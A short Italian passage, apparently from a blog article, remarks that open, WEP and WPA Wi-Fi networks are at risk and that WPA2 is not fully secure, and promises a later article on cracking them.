Quindi le reti non protette sono a rischio, anche le reti WEP e da poco anche le WPA. La WPA2 non è del tutto sicura. Mostrerò, in un prossimo articolo, quanto sia facile craccare una rete WEP o WPA e in alcuni casi anche WPA2.